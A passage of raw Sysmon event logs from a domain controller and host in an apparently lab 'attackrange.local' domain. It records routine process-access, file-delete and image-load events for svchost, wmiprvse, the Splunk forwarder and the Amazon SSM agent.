L32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.432{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.432{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.432{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.370{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.135{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68FF5D97D9ABFA02DF1108FB03069CF2,SHA256=E9D0724C3842A8A5ECD9BF1DC0E81D90F7B4B1E967A02D69070A455436E40393,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980944Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:19.083{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4318MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.026{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EE497D2B46097E5DACCC96A0C9B388BD,SHA256=0F66E5E2348D418CCCE2D053A1BCF638BA273359340136A62EF97182E154304A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.026{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EE497D2B46097E5DACCC96A0C9B388BD,SHA256=0F66E5E2348D418CCCE2D053A1BCF638BA273359340136A62EF97182E154304A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.026{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F591F1E20E798EA82E2192D90342FF7B,SHA256=46D22B1E966C3FFCCA7BC42651B1BC9C2CDFD721168C165564C5F7AE438942EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.010{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=725A6EF1752AE9965DD3D2D3CAFC89F7,SHA256=C37285F28AC878B36B512BE720F194035225B0410EC5BBF6EDA960B7C46E918E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.995{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8D4A-6151-A300-00000000FD01}6088C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.995{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D4A-6151-A300-00000000FD01}6088C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.995{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F46E336FFF575D388FC6CFF255FBFEF6,SHA256=4611E4CC00ED0B7A0E9A718FA56BFDF5A9BB77388574050D6E307911EC4DBF1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.995{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E99310EA145CBE883A8361B0BFD7379A,SHA256=212B3690C4863C4F7EF6F7DDB40A941ADA246230FB8D7B4DBF9021B9CEFC1D5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980948Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:20.345{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4144E830F27EB3DDCFBFD648E4C9F3AB,SHA256=A554A6731ABDE378E47F35444E3AE62BB72B978F19926CBC113010DEEE260E9B,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001056222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.903{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 23542300x80000000000000001056221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.731{5EBD8912-8CC0-6151-1200-00000000FD01}484NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\System32\LogFiles\WMI\SUM.etlMD5=5034CDF7E28ACE10D9521F36EDC5CD5C,SHA256=E3BD8B34B9627A4D5C433E9C7CF810F193C6EFCDFA45C1477F488102DD6A72C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.606{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.606{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 